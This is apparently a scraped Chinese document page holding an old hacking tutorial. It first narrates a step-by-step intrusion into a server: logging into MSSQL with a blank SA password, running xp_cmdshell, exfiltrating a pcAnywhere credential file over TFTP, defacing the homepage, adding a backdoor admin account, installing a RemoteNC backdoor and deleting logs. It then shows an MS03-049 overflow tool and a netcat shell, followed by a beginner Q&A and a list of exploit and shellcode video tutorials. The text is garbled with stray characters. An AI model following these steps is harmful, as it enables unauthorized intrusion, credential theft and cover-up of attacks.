为了正常的体验网站,请在浏览器设置里面开启Javascript功能!
首页 > SQL网站入侵及黑客基础知识

SQL网站入侵及黑客基础知识

2013-09-26 20页 pdf 52KB 28阅读

用户头像

is_987100

暂无简介

举报
SQL网站入侵及黑客基础知识 没有 百度文库财富值 请到 文库帮手网 www.365xueyuan.com 免费帮下载 百度文库积分 资料 本文由Hazyle贡献 doc1。 本帖最后由 R.E.C--F22 于 2010-6-18 13:21 编辑 一 SQL 入侵教程 先 ping 出目标主机的 IP 地址: 连接 IP 主机: 211.154.xxx.xx⋯⋯ 发送 ? 56 个字节⋯⋯ 接收到 56 个字节! 历时: 0 毫秒 结论: IP 主机正在与 Internet ? 连接中⋯⋯ ...
SQL网站入侵及黑客基础知识
没有 百度文库财富值 请到 文库帮手网 www.365xueyuan.com 免费帮下载 百度文库积分 资料 本文由Hazyle贡献 doc1。 本帖最后由 R.E.C--F22 于 2010-6-18 13:21 编辑 一 SQL 入侵教程 先 ping 出目标主机的 IP 地址: 连接 IP 主机: 211.154.xxx.xx⋯⋯ 发送 ? 56 个字节⋯⋯ 接收到 56 个字节! 历时: 0 毫秒 结论: IP 主机正在与 Internet ? 连接中⋯⋯ 接着选择打开扫描器 x-way,选择高级扫描功能。输入目标 IP,开始扫描。数分? 钟后得 到扫描结果如下(结果经整理) : 主机信息 主机名:BEWDB01NOK 80(HTTP) 21(FTP Control) 25(SMTP) 443(HTTP? S) 1433(MSSQL) 5631(PCAnyWhere) 用户列表 Administrator (Admin) Guest hacke? r (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin) 漏洞:? /\../readme.txt (HTTP: 200 ) /msadc/msadcs.dll (HTTP: 200 ) /iisadmpwd/ac? hg.htr (HTTP: 200 ) /_AuthChangeUrl (HTTP: 200 ) /?PageServices (HTTP: 200? ) 上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的 as? p/cgi 漏 洞。而从所开端口来看, 21(FTP Control) 1433(MSSQL) 5631(PCAnyWhere) 只有这三个可用。在万一得已的情况下,我是? 不会用暴力破 ftp 的。那么只好从 1433,5631 这两个端口入手了!我们知道,1433? 是 ms-sql 的服务端口,默认情况下它的最高 权限用户帐号 SA 口令为空。如果管? 理员疏忽了这一点,没有给SA一个口令的话,事情就 好办了!先来试试看。从 ww? w.tianxing.org 下一个 ms-sql 的客户端,在 Host 框中输入目标 ip:211.154.xxx? .xx Username 为 sa password 框空,连接: SQL>Connecting 211.154.xxx.xx SQL>Connected to 211.154.xxx.xx 呵呵!看来对方管理员没有对 sa 设置一个口令!太好了!可以在客户端以 xp? _cmdshell " "的形式运行任意 dos 指令了!dir 一下试试看: SQL>Command: xp_c? mdshell "dir c:\" 驱动器 C 中的卷没有卷标。 卷的序列号是 5CBD-664C 卷的序列? 号是 5CBD-664C c:\ 的目录 c:\ 的目录 01-12-20 08:13p 2u2u 01-07-23 08:10p? 0 AUTOEXEC.BAT 01-11-28 04:02p 84 biaoti.txt 01-07-23 08:10p 0 CONFIG.SYS? 01-11-22 11:49a InetPub 01-10-25 11:12a 15,360 kkkk.XLS 01-07-24 12:09p ? MSSQL7 01-12-12 11:00a 134,217,728 pagefile.sys 01-11-30 10:59a Program ? Files 01-09-04 02:43p 136 sp_attach.sql 01-12-20 04:12p temp 01-09-27 11:? 14a unzipped 01-12-15 12:09a WINNT 13 个文件 134,233,308 字节 54,232,576? 字节可用 54,232,576 字节可用 这时我们便可以改对方的主页了!前提是先找到对方的 ? web 目录!来找找看 ⋯⋯⋯⋯ XX分钟后,满头大汉,乖乖!竟然有X个盘,每个? 盘下又有XX个目录,这样找下去得何 年何月?不成!要是有 windows 界面的形式? 就好找的多了!想想看,目标主机还开着 5631 端口,这正是 pcanywhere 远程管理? 端口呀!取了它的管理帐号和密码不就得了吗?不错的 想法,呵呵⋯⋯ 默认情况下? ,pcanywhere 安装于 c:\Program Files 目录下, data 目录下的.cif 文件中保存? 着 其 加密过的连接帐号和密码。只要得到此文件,就可以用一个叫 pcanywherepwd? 的软件快速 解出密码! 且看如何得到这个.cif 文件。先用 x-way 的内置 tftp 服务器在本机建立 tf? tp 服务: 选择“工具”菜单中的 tftp 服务器。设置一个默认根目录,点启动即可? ! 然后再用 ms-sql 客户端在目标服务器执行如下指令: copy c:\progra~1\pcany? page 1 where\data\New Caller.CIF c:\winnt\system32 tftp -i 本地 ip put New Caller? .CIF 命令执行成功,这个 cif 文件已被传到本地 tftp 目录下了! 此时,用 pcan? ywherepwd.exe 破解此文件,得到用户名为:administrator 密码为:amsrepair 打开 pcanywhere manager 建立一个指向 211.154.xxx.xx 的通道。在 settin? g 项中选择 network host pc to control or ip adress, 并添上目标 ip:211.154? .xxx.xx 选中 login information 项中的 automatically login to host up conne? ction 并在下面的 login name 和 password 栏中添入刚才得到的用户名和密码!确? 定即可。双击新 建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~? 在 g:\home\wwweb\目录下,终于找到了他们的 index.htm。删!再手动定一个简单的? 文件: hacked 保存为:index.htm 修改主页完成。 该留个后门了,这是个 NT 主机,用小榕的 RemoteNC 做后门最好不过了! 先? 给系统加个超级用户,用 ms-sql 来做: net user wing wing /add net localgrou? p administrators wing /add 从对方桌面上打开 ie 连到小榕的站上下载 RemoteNC,然后进入命令提示行状? 态,键入: RemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provid? e Local CMD Redirect" 7 123456 系统显示: [Install Service as RunasUser Mo? de] Connecting 211.154.xxx.xx ⋯⋯ Done. Transffer File ⋯⋯ Done. Start S? ervice ⋯⋯ Done. Now You can 211.154.xxx.xx to Connect, Have a Joy 安装成功 这样在任何时候都可以 telnet 211.154.xxx.xx 7 输入密码:123456 即可使用? 系统任何资源了! 接下来该清理战场了,在 ms-sql 下停掉对方的 ftp 和 www 服务: net stop? msftpsvc net stop w3svc 删除 c:\winnt\sys tem32\logfile 下的所有文件。 再? 将服务恢复: net start msftpsvc net start w3svc 二.黑客攻击的基本步骤 互连网的普及随之带来的很多问题,现在安全越来越让人们重视,让人感觉黑客? 无孔不入, 对黑客的技术感到很神秘, 都想知道黑客是怎么实现攻击的, 今天我就? 来简单的讲讲黑客攻 击的基本步骤。 让我们先来认识一下 hacker 这个词,有人认为它是计算机天? 才的代表词,有人认为它代表 着攻击,到底 hacker 这个词是指什么呢?现在的媒体? 已经将这个词定义成贬义的了,其实 在早期这个词是指哪些对计算机有很深研究的一? 部分人, 他们有着很专业的计算机知识, 今 天媒体讨论的 hacker 这个词在黑客界? 只是代表 cracker(有着和 hacker 一样的技术, 但他们以 搞破坏为主,以入侵窃取? 资料作为他们的工作和游戏),但在黑客资料漫天飞的今天谈论这 个已经没有意义了? ,因为 hacker 和 cracker 只隔着一层意念。 好了,我们不要在为 hacker 这个伤? 脑筋词在说什么了。来讲讲黑客是怎样入侵的吧。 黑客的入侵好比一场战斗,首先要? 做的就是探测,然后就是对得到的资料进行分析,整理入 侵资料,制定入侵,最? 后才实施入侵,其实入侵的时间是很短的。也许这样讲还有很多 人感到迷惑,那我就? 结合实际来讲讲吧。 首先,我们选择适合自己的扫描器:x-scan、x-way、流光、su? perscan,都是不错的扫描器,如 果你是新手的话建议用流光和 x-way(本人对这个两个? 软件强大的功能十分佩服,但不太喜 欢用,本人偏爱的还是 x-scan)。以下就是我用? x-scan 扫描到的一个机器的信息。 *****************************************? ************************************** ********* X-Scan v2.3 检测报告 [扫描? 结果索引]: "218.91.237.159" 开放端口 SQL-Server 弱口令 FTP 弱口令 NT-Serve? r 弱口令 IIS 漏洞 [NetBios 信息] 远程注册表信息 服务器信息 主域控制器名称 ? 网络传输列表 网络会话列表 网络服务器列表 网络磁盘列表 网络共享资源列表 网络? 用户列表 本地组列表 组列表 网络文件列表 计划任务列表 网络映射列表 详细资料? [开放端口] 端口 113 开放: Authentication Service [Banner] [None] [End of ? banner] 端口 135 开放: Location Service [Banner] page 2 [None] [End of banner] 端口 139 开放: NETBIOS Session Service [Banner? ] [None] [End of banner] 端口 445 开放: Microsoft-DS [Banner] [None] [End ? of banner] 插件类型: PORT 插件成员名称: 开放端口 插件作者: glacier 插件版本: 1.7? 风险等级: 低 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引? 擎 [SQL-Server 弱口令] [FTP 弱口令] [NT-Server 弱口令] [NetBios 信息] [服务? 器信息 Level 101]: 主机名称: "218.91.237.159" 操作系统: Windows NT 系统版本? : 5.1 注释:"" 主机类型: WORKSTATION SERVER POTENTIAL_BROWSER MASTER_BROWSE? R [服务器时间]: 12-15-2003 15:38:59 GMT [网络会话列表 Level 10]: AMD\ 活动? :151 Sec., 空闲:151 Sec. AMD\ 活动:12 Sec., 空闲:0 Sec. [网络服务器列表 Level 101]: 主机名称:"QUN7O0JUIPQX6WJ" 操作系统: NT v? 5.1 注释:"" 主机类型: WORKSTATION SERVER POTENTIAL_BROWSER MASTER_BROWSER ? [网络共享资源列表 Level 1]: "IPC$": 进程间通信(IPC$) - [远程 IPC] (System)? 插件类型: NETBIOS 插件成员名称: NetBios 信息 插件作者: glacier 插件版本: ? 1.1 风险等级: 高 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜? 索引擎 [IIS 漏洞] 扫描全部完成 *******************************************? ************************************ ************ 从上面的报告来看我们得知的信息有以下几点: 1.主机的的操作系统为 Windo? ws NT 系统版本: 5.1 它的时间为 12-15-2003 15:38:59 GMT。 2.主机的名称为"QU? N7O0JUIPQX6WJ"。 3.主机开放的端口有 113 135 139 445。 4.主机有 IPC$共享资源? 。 以上的信息足以发起一次攻击, 但我们为了安全应该再多收集一些关于该主机的? 资料。 对于 以上的信息我们可以用最近最新的漏洞来攻击,比如它开着 135 和 44? 5 我们就可以用 workstation 远程溢出漏洞来试试。也可以用 crackerpasswd.exe ? 来暴力破解它的管理员密码, 总之开着 135、139、445 的主机是很危险的,有很多? 的漏洞就是基于这几个端口的。 上面的主机我也没攻击,为了大家能够了解攻击全过? 程,我们假设来攻击这个主机。我们就 用最近刚发布的漏洞 Windows Workstation ? 远程溢出漏洞来攻击。我们可以到黑客站点获取 溢出代码或者溢出工具,然后就是进? 行攻击。请看下面(下面只是一个假设的例子!: ) **************************? ***************************************************** **** D:\heike\tools\? 溢出>workstation.exe Windows Workstation ms03-049 wkssvc.dll buffer overfl? ow bug discoveried by eEye,code by Hanabishi,shellcode by oc.192 Modifie? d by sbaa(sbaa@163.net) 2003/11/16 ver 0.2 Usage: On 2k : workstation.exe ? IP --> attack 2k without ntfs On xp : workstation.exe IP 2k --> attack 2k ? without ntfs workstation.exe IP --> attack xp Next open another window : n? c Ip 1234 --> Get cmd shell @.@ ******************************************? ************************************* ***** 以上是工具的用法 *************? ****************************************************************** ****** ? D:\heike\tools\溢出>workstation.exe 218.91.237.159 can’t find NetAddAlter? nateComputerName (Now try to attack 2k!) 出现如上信息的话,我们就可以用 nc.exe 来连接主机了 ******************? ************************************************************* **** D:\heik? e\tools\溢出>nc 218.91.237.159 1234 Microsoft Windows 2000 [Version 5.00.2? 195] (C) 版权所有 1985-2000 Microsoft Corp. C:\>WINNT\system32> *************************************************? ****************************** ****** 到了这里我们就进入了主机,可以做自己? 想做的事了,找资料,做后门⋯⋯等到一切都做好 了以后我们就可以清除日志走人了? 三.黑客入门篇初级知识问答 给电脑新手的东东,呵呵~~~,如果你自认为已经很厉害了,那么就请把这篇狗? 屁文章推给 那些刚上网的朋友吧。 Q=question(问) A=answer(答) page 3 Q:windows 下 ping 命令怎么用呀?? A:在 MS-DOS 下打: ping ip/host 打 p? ing /? 看详细说明 (不过是 E 文的哟) Q:那么 windows 下还有哪些实用的网络命令呢?A: PING 命令:用于从一个主? 机向另一个主机发送 Internet 控制消息(ICMP)数据包。ping 使用 ICMP ECH? O-REQUEST 命令传送数据包,并且对每一个传送的数据包期望得到一个 ICMP ECHO-R? EQUEST“ping”这个名字来源于声的探测设备(声纳) ,这种设备使用一种类 似“? ping”的声音的声波确定周围区域的目标。 NETSTAT 命令:用于查询与某类信息有关? 的子系统。打印路由选择表、活动连接、正在使用 的流以及其他一些信息。 NBTSTA? T 命令:用于查看当前基于 NETBIOS 的 TCP/IP 连接状态,通过该工具你可以获得 远? 程或本地机器的组名和机器名 ARP 命令:用于显示并修改 Internet 到以太网的地址? 转换表。这个表一般由地址转换协议 (ARP)来维护。当只有一个主机名作为参数时? ,arp 显示这个主机的当前 ARP 条目。如果 这个主机不在当前 ARP 表中那么 ARP ? 就会显示一条说明信息。 IPCONFIG(Windows 95 里叫 WINIPCFG)命令:用于显示两? 条信息,IP 配置信息和 IP 配置 参数, 它能报告出你机器中的拨号网络适配器和以? 太网卡的信息, 以下给出了一个拨号网络 适配器的部分信息 用网络命令 /?可以查? 看其说明 如:ping /? Q:怎么样打开注册表编辑器 A:开始>>运行>>输入 regedit>>点? 确定 Q:中了视窗炸弹(多指包含有恶意代码的网络文件)了, 怎么办? A:按 Ctrl+Alt? +Del 然后把那个有炸弹的主窗口关掉.最好是关掉本机的 java 功能,不轻易打 开别? 人发你给你的 url(统一资源定位符的意思,简单的说就是那个一大串长的网址)。 Q:我怎么才能查出我上网时的本机 IP? A:在命令行下打 ipconfig Q:我能从 IP 找出那个人用的是那一个 ISP 和国家吗?? A: 有 好 多 工 具 有? 这 个 功 能 , 最 实 用 的 有 一 个 叫 追 捕 的 。 可 以 到 华 军 下 一 个? (www.newhua.com),进到华军主页以后,点左边的软件分类,在下一页上选网络工具? 那一 类当中的 IP 工具,打开后,第一个工具就是你要下的追捕,当然还有好多,I? P 工具建义把 那个叫什么网络助手的也下了,一个不错的网络工具,功能强大。追捕? 的压缩包里有一个叫 wry.dll 的文件,你把扩展名改为 wry.doc 或是 wry.txt,里? 面是 IP 分配,慢慢看吧,挺有意 思的。 Q:电脑被 e 人入侵了, 怎么办? A:去装个防火墙, 或用杀木马的程序把本机中? 的木马杀掉。 另外不要轻易下载并执行不安全 的.exe 文件,不要乱打开陌生人发来? 的信的附件。 Q:请 xxx.yeah.net/xxx.126.com 这样的域名是怎么弄的? (wk,这样的问题也来? 问, 惨~~) 哎, A:你可以去免费的域名提供商 my.yeah.net 申请一个,前提是? 你最好先要有一个主页空间。 如果你手里银子多的话可以花几个子儿去买一个顶级域? 名(就是这样的 www.youname.com/net/org/⋯⋯),看上去就过瘾,嘿嘿~~ Q:我有一个免费的空间,为什么不能放 asp,cgi,php 之类东西呢,天呀? A:据? 我所知,好象要使你的主页也能支持 asp,cgi,php 得花一些银子,租个空间,hehe~? ~,免 费的就是免费的,不可能给你太多的功能的。 Q:常见的端口号及相应的服务有哪些? A:21 FTP-文件传送 (用 CuteFtp 等 ? Ftp 软件维护网站用的就是该协议)23 TELNET - 远程 登录 (管理员和黑客远程控? 制系统的最基本手段)25 SMTP - 邮件发送 (Outlook Express 或 FoxMail 等邮件? 程序发 Email 用)53 DNS - 域名解析 (实现域名和 IP 地址之间的转换) 80 HTT? P - Web 服务 (最常用的为 Internet Explorer 等浏览器提供网页服务)110 POP3? - 邮 件接收 (Outlook Express 或 FoxMail 等邮件程序收 Email 用)⋯⋯ 端口? 范围为 0-65535, 0-1024 为系统使用,剩下的用户自己定义,所以聊天软件和木马? 等 使用的端口大多都大于 1024。 Q:你好,能不能告诉我 ICMP 是啥东西? A:ICMP 的全称是 Internet Control? Message Protocol(网间报文控制协议) ,它是 IP 不可 分 割的一部分,用来提? 供错误报告。一旦发现各种错误类型就将其返回原主机,我们平时最常 见的 ping 命? 令就是基于 ICMP 的。你可以在网上找一下详细的资料看看。 page 4 Q:你好,我用的是 win98 听说 netbios 这个东西很烦人,我怎么样关掉它呀?? A:首先,打开控制面板,进入“网络”对话窗,在配置表中,查看列表中是否已有 ? NetBEUI 组件,如果有,则直接跳过下一段。如果在列表中没有 NetBEUI 组件,则先? 点击“添加”按 钮,在“要安装的网络组件类型”列表中,选择“协议”一项,再次? 点击“添加”,在“网络协议” 对话窗中,选择 Microsoft 的 NetBEUI,然后,插? 入 Windows 安装盘,点击“确定”即可。 回到“网络”对话窗, 在网络组件中选择? “拨号适配器”, 点击“属性”, 在“属性”对话窗中选择“绑 定”按钮,将除 ? TCP/IP 之外其它协议的复选框里的小勾清除掉。最后,再次回到“网络”对话 窗,? 选择 TCP/IP 协议,点击“属性”,这时有可能会弹出一个警告窗口,不用理它,直? 接点 “OK”就行了,进入 TCP/IP 的“属性”窗口后,选择“绑定”,将所有网络协? 议复选框内的小 勾去掉,点击“确定”,这时,Windows 会提示你至少应选择一种协? 议,仍然不用理它,点 击“No”,关闭窗口。重新启动你的计算机,这样,你计算机? 中的 NetBIOS 后门就已被关闭 了。这样一来,NetBIOS 已从你计算机的 TCP/IP 协? 议中去除,当然,你最好检查一下·作是 否成功: 回到“网络”对话窗, 选择 TCP? /IP 协议, 点击“属性”, 在“属性”窗口中点击 NetBIOS 栏,这时,你会看到“? 我希望在 TCP/IP 协议中开启 NetBIOS(I want to enable NetBIOS over TCP/IP)? ”一项,该项前面的复选框应该没有打勾。现在,你就可以放心地在网络中漫游, 而? 不必再担心有人会通过 NetBIOS 入侵你的电脑,我的天呀,手好累哟 Q:我的电脑被 e 人用 IGMP 一直弄当机, 怎么办? A:去下载一下补丁包或是上? 防火墙(天网的个人版就不错,不是很大,可以试试)天网网址是 sky.net.cn。 还有? 其他的防火墙工具如: LockDown 2000 等, 可以在网上找一找, 下一个装上, 祝? 你好运~~~~~~~~~~。 Q:为什么我的 windows ]有 MS-DOS 模式? (K,不会吧,我的怎么有呢?) A:其? 实这可能是因为你没有耐心找到, 开始>> 关闭系统>>重新启动计算机并切换到 MS-D? OS 方式或开始>>程序>>MS-DOS 方式就行了。 Q:要如何隐藏上网的 IP 呢? A:最简单的是通过 Proxy(代理)上网,你可以? 用代理猎手搜一下。代理猎手黑白网络 (www.521hacker.com)上就有,不过我昨天帮? 朋友下,怎么没下来呢,K~~~~。 Q:我上网密码被盗用了怎么办? A:马上给你的 ISP 打电话寻求帮助, 然后学的? 聪明一点儿, 不要把密码存在电脑中, 用查木 马的软件查一下本机,看有没有中木马? 程序,如果有,就赶快杀掉。如果没有,就要小心, 害人之心不可有,但防人之心不? 可无呀,兄弟。 Q:我刚装了 Linux, 但是却不能开机, 怎么办? A: 为了要让你的机子还能继续? 跑 windows, MS-DOS 下(别告诉我你还找不到 MS-DOS)打 fdisk /mbr 把 lilo 清掉? Q:我在重编 Linux 核心后就不能开机了, 为什么? A:可能是因为你没有把 lil? o 再装一次, 记住,在编好 Linux 核心后打 lilo 指令重 blilo, 或用 Linux 启动? 盘再 b 一次 lilo。 Q:为什么我上传的网页跟我在电脑里看到的不一样, 有的文件还找不到!555~~~? ~ A:在某些网络服务器上对文件的大小写是有区别的, 请确定你在编写网页时的大小? 写文件 名。还有就是有些免费的主页空间的系统默认的文件名是.html,而不是通常? 我们做完后 的.htm,网易的空间就是这样,所以用 DW3等网页制作工具做完后,在? 上传前先把扩展名 改一下, 而且网页文件最好不要用中文名。 还有一个可能就是路? 径的问题, 可能是路径错误, 在本地机上的网页文件最好全放在一个文件夹内,并? 且使用相对路径连接。 Q:UNIX, Linux, Windows 这三种操作系统有何不同? A:Wind? ows 可能就是你现在正在使用的操作系统, 因为目前国内绝大多数家庭和个人用户都? 用这个。 如果你是一个已经在用 Linux 或 UNIX 的朋友,对这个 FAQ 就不用看了? 。 Linux 是一个诞生于网络, 成长于网络且成熟于网络的奇特的操作系统。 由于他? 是一个类 UNIX 的 操作系统,完全遵从 UNIX 的 POSIX , 而且它的硬件要求远? 远低于一些著名的 UNIX 版 本, 只要一台 386 以上的 PC 机就能运行了, 所以他? 是学习 UNIX 的一个最适合的版本。 UNIX 是一个 32 位或是 64 位的非常方便的多? 用户,多任务的操作系统。具有完整的 TCP/IP 客户 和服务器套件。UNIX TYPE 的 ? page 5 system 有很稳定的特性, 很少当机,且效率高,Internet 上的服 务器多数是用 UNIX? 的。 但是 UNIX 版本繁多, 相互存在不兼容的问题。 如果想知道的更多, 可以在? 网上找详细的资料。 Q:我听人家说用 NT 或 Linux 能直接入侵 e 人电脑! 这是真的吗?(哇好酷~~,? 我也要做黑客, xixi~~~~~~) A:错, 一个操作系统的高级性和能不能入侵是不成正? 比的, 因为能不能入侵是完全取决于你 的技术和知识(如果你连 MS-DOS 和注册表在? 哪都找到,那就先不要想这些了)而不是电脑 操作系统的强大性。这一点请大家要弄? 清楚, 常看到有人乱传说用这类系统就能直接入侵, 听了觉得很好笑,反正我是不懂? 入侵的,因为俺是小菜。 Q:我从外面主机上下载了 PASSWD 文件, 为什么不能解出密码?(好急呀,汗都? 下来了) A:原因有很多 1.你下载下来的是 shadow 过的密码档 2.你的解码工具指令? 有错误 3.你的字典档中没有这类密码字符串 现在绝大多的主机对密码都有做过 shado? w 了, 可以说是 10 台里有 10 台是这样做的, 简单 的抓 PASSWD 密码档,做 root? 已经成为历史了。 Q:我在一些高手的主页上看到留有 OICQ,可是我加了他们后都不理我, 不回答? 我的问 题?(真让我伤心,本来好崇拜他们的) A:原因有好多 1.可能是因为高手们很? 忙, 没时间去回答你的问题 2.也可能是你的问题太菜了些,高手们对于你的问题觉得? 没有挑战性,回答会浪费时间 3.高手们用 QQ 通常都是拿来跟朋友聊一些技术问题或? 是泡妹妹(呵呵, 可能这是他们心的真 正原因吧,~~~~~~我是乱说的,你可别当真)? 用的 4.还有最后一点是,你在把那些高手加为好友的时候,他们可能没有加你。等到? 下次你开 QQ 的时候,你在他们的陌生人里,呵呵,所以⋯⋯ ⋯⋯ 好好学习吧,想? 着自己以后要成为什么样的高手。:有时候我的电脑上突然出现一些错误信 息, 一大? 堆字屏幕也变色了,好怕。用笔抄的手都软了,有什么 k 法直接把那些错误的信息 ? 直接记下吗? (我的手现在还痛呢) A:能! 如果你是在纯 MD-DOS 模式下, 请把打印机? 插上, 直接在键盘上按 Print Screen/SysRq 键就能直接把屏幕上的字都印出来了!(? 什么。。你没有打印机,55555~~~~~~,和我一 。 样) 或是你再跑一次指令, ? 然后把那指令的错误信息都转到文件里,如: 程序.exe err.txt 然 后会有一个 err? .txt 的文件生成, 你直接把此文件贴到网上各大电脑网络相关的书屋(建议上 www.s? 8s8.net,不错的,我就常在这)上,请高手们帮忙(s8s8.net 上有不少热心人的)。如? 果 你是在 windows 下运行的,也可以按 Alt+Print Screen/SysRq 然后打开画板程? 序,copy 上就 行了。这样就存成了一个.bmp 的文件,然后找一个什么图象转换工具? 转换格式再压缩,贴 到书屋上去,请高手们帮你解决。 四.黑客视频教程地址 01 ping 命令的使用 http://images.enet.com.cn/eschool/wmv/ping.wmv 02 netstat 命令的使用 http://images.enet.com.cn/eschool/wmv/netstat.w? mv 03 tasklist 和 taskkill 的使用 http://images.enet.com.cn/eschool/wmv/? tasklist.wmv 04 扫描器 X-SCAN 的使用(上) http://images.enet.com.cn/eschool/wmv/x-s? can1.wmv 05 扫描器 X-SCAN 的使用(下) http://images.enet.com.cn/eschool/wmv/x-s? can2.wmv 06 先试手:Ipc 漏洞 http://images.enet.com.cn/eschool/wmv/ipc.wmv 07 shed 共享扫描器的使用 http://images.enet.com.cn/eschool/wmv/shed.w? mv 08 superscan3 扫描器的使用 http://images.enet.com.cn/eschool/wmv/supe? rscan3.wmv 09 流光扫描器的应用 http://images.enet.com.cn/eschool/wmv/liuguan.wmv? 10 win2000 自动攻击器的使用 http://images.enet.com.cn/eschool/wmv/win? 2000.wmv page 6 11 俄罗斯扫描器 SSS 简单使用 http://images.enet.com.cn/eschool/wmv/ss? s.wmv 12 dameware 远程管理工具的使用 http://images.enet.com.cn/eschool/wmv/? dameware.wmv 13 找回 ADSL 拨号的密码 http://images.enet.com.cn/eschool/wmv/adsl.wm? v 14 缓冲区及溢出的道理视频教程 http://images.enet.com.cn/eschool/wmv/0? 1.wmv 15 溢出例子和分析视频教程 http://images.enet.com.cn/eschool/wmv/02.wm? v 16 Shellcode 介绍视频教程 http://images.enet.com.cn/eschool/wmv/03.wm? v 17 缓冲区溢出简单利用视频教程 http://images.enet.com.cn/eschool/wmv/0? 4.wmv 18 构造利用视频教程 http://images.enet.com.cn/eschool/wmv/05.wmv 19 FOXMAIL 漏洞编写-漏洞公告 http://images.enet.com.cn/eschool/wmv/06? -1.wmv 20 FOXMAIL 漏洞编写-溢出定位 http://images.enet.com.cn/eschool/wmv/06? -2.wmv 21 FOXMAIL 漏洞-shellcode 编写 http://images.enet.com.cn/eschool/wmv/? 06-3.wmv 22 IIS.printer 利用程序 http://images.enet.com.cn/eschool/wmv/07.wmv 23 JMPCALL EBX 溢出利用方式 http://images.enet.com.cn/eschool/wmv/08s? 1.wmv 24 JMP ESP 改写 JMP EBX 课程 http://images.enet.com.cn/eschool/wmv/09? tr.wmv 25 IDQ-IDA 漏洞利用程序编写 http://images.enet.com.cn/eschool/wmv/010? .wmv.wmv 26 ShellCode 的基本概念 http://images.enet.com.cn/eschool/wmv/0011.wm? v 27 打开 CMD 的方法-1 http://images.enet.com.cn/eschool/wmv/12-1.wmv 28 打开 CMD 的方法-2 http://images.enet.com.cn/eschool/wmv/12-2.wmv 29 打开 CMD 的方法-3 http://images.enet.com.cn/eschool/wmv/12-3.wmv 30 打开 CMD 的方法-4 http://images.enet.com.cn/eschool/wmv/12-4.wmv 31 shellcode 通用性初步探讨 http://images.enet.com.cn/eschool/wmv/001? 3.wmv 32 Windows 对话框的编写-1 http://images.enet.com.cn/eschool/wmv/014-1? .wmv 33 Windows 对话框的编写-2 http://images.enet.com.cn/eschool/wmv/0014-? 2.wmv 34 给系统添加用户-1 http://images.enet.com.cn/eschool/wmv/015-1.wmv 35 给系统添加用户-2 http://images.enet.com.cn/eschool/wmv/00015-2.wmv? 36 黑客工具 NC 的使用教程 http://images.enet.com.cn/eschool/wmv/nc.wm? v 37 智能 ABC 和 guest 帐号问题 http://images.enet.com.cn/eschool/wmv/a? bc.wmv 38 MS05039 漏洞利用教程 http://wmv/nc.wmvhttp://wmv/nc.wmv 39 Iris 分? 析 TCP_IP 协议谈-001 http://images.enet.com.cn/eschool/wmv/Iris1.wmv 40 Iris 分析 TCP_IP 协议谈-002 http://images.enet.com.cn/eschool/wmv/? Iris2.wmv 41 Iris 分析 TCP_IP 协议谈-003 http://images.enet.com.cn/eschool/wmv/? page 7 Iris3.wmv 42 在系统中建立隐藏帐号 http://images.enet.com.cn/eschool/wmv/hideuse? r.wmv 43 autorun 介绍与利用 http://images.enet.com.cn/eschool/wmv/autorun.w? mv 44 iis 的安全配置介绍 http://images.enet.com.cn/eschool/wmv/iis.wmv 45 realplay 网页木马的制作方法 http://images.enet.com.cn/eschool/wmv/? realplay.wmv 46 radmin 远程管理的配置 http://images.enet.com.cn/eschool/wmv/radmin? .wmv 47 Virtual PC 虚拟机的使用 http://images.enet.com.cn/eschool/wmv/virt? ualpc.wmv 48 pstools 工具包简单使用 http://images.enet.com.cn/eschool/wmv/pstoo? ls.wmv 49 telnet 和 ntlm 认证问题 http://images.enet.com.cn/eschool/wmv/teln? et.wmv 50 堆栈和堆缓冲区溢出比较-001 http://images.enet.com.cn/eschool/wmv/d? ui001.wmv 51 堆栈和堆缓冲区溢出比较-002 http://images.enet.com.cn/eschool/wmv/d? ui002.wmv 52 堆栈和堆缓冲区溢出-003 http://images.enet.com.cn/eschool/wmv/dui00? 3.wmv 53 堆栈和堆缓冲区溢出比较-004 http://images.enet.com.cn/eschool/wmv/dui004.wmv 五.黑客是怎样炼成的 编者:关于黑客是怎样炼成的,网上有了 n 个版本了。不过多数是哗众取宠。? 看看这个吧,是我在网上所能看到的最详细的教程了.相信对你一定会有好处的。 基础: 如何去学习 ·要有学习目标 ·要有学习计划 ·要有正确的心态 ·有很强的自学能力 学习目标 ·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家? ?网络黑客等) ·2.自己目前的水平和能力有多高 ·能简单操作 windows2000 ·能简? 单配置 windows2000 的一些服务 ·能熟练的配置 Windows2000 的各种服务 ·能熟? 练配置 win2000 和各种网络设备联网 ·能简单操作 Linux,Unix,Hp-unix, Solaris? 中的一种或者多种操作系统 ·能配置 cicso,huawei,3com,朗迅等网络设备 ·会简? 单编写 C/C++,Delphi,Java,PB,VB,Perl ·能简单编写 Asp,Php,Cgi 和 script,she? ll 脚本 ·3.必须学会不相信态度,尊重各种各样的能力 ·不要为那些装模做样的人浪费? 时间 ·尊重别人的能力, ·会享受提高自己能力的乐趣. ·在知道了自己的水平和能? 力之后就要开始自己的目标了 ·安全专家 ·黑客 ·高级程序员 ·黑客是建设网络? ,不是破坏网络, 破坏者是骇客; ·黑客有入侵的技术,但是他们是维护网络的,所以和? 安全专家是差不多的; ·因为懂得如何入侵才知道如何维护 ·因为懂得如何维护才更? 要了解如何入侵 ·这是 黑客与安全专家的联系 ·但,他们都是在会编程的基础上成? 长的! ·下面我们开始我们的学习计划! 学习计划 有了学习计划才能更有效的学习 安全学习计划 不奢求对 win98 有多么精通,我们也不讲解 win98 如何应用,如何精通,我们的? 起步是 win2000 s erver,这是我们培训的最低标准,你对英语有一定的了解也是必不? 可少 最基础 ·a.会装 win2000,知道在安装的时候有两种分区格式,NTFS 与 FAT32 ? 及他们的区别,知道 win2 000 可以在安装的时候分区,格式化硬盘, 可以定制安装,可? 以定制自己需要安装的一些组件 ,如果有网络适配器,可以直接加入域中 学习点:NTF? S 和 FAT32 分区的不同 各个组件的作用 域的定义 ·b.知道如何开,关机 知道注销? page 8 的用处 ·c.知道 win2000 下面各主要目录的作用 Documents and Settings,WINNT,? system32 Progra m Files ·d.知道管理工具里面各个组件的定义 ·e.学会应用命令? 提示符 cmd(dos) ·f.知道计算机管理里面的各个选项的不通 ·g.知道 win2000 强? 